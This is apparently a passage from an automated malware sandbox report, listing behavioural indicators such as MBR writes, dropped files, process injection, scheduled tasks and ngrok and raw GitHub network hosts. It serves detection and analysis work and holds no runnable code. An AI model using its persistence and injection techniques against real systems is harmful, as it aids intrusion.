| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SETD746.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File created | C:\Windows\system32\SubDir\Client.exe | C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SETD736.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SETD746.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup32.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SETD736.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 5036 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\winn.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 4240 set thread context of 3504 | N/A | C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe | C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe |
| PID 4792 set thread context of 3120 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 4792 set thread context of 4036 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmlaunch.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmlaunch.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\DISABL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\Logs\DirectX.log | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\322341857.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
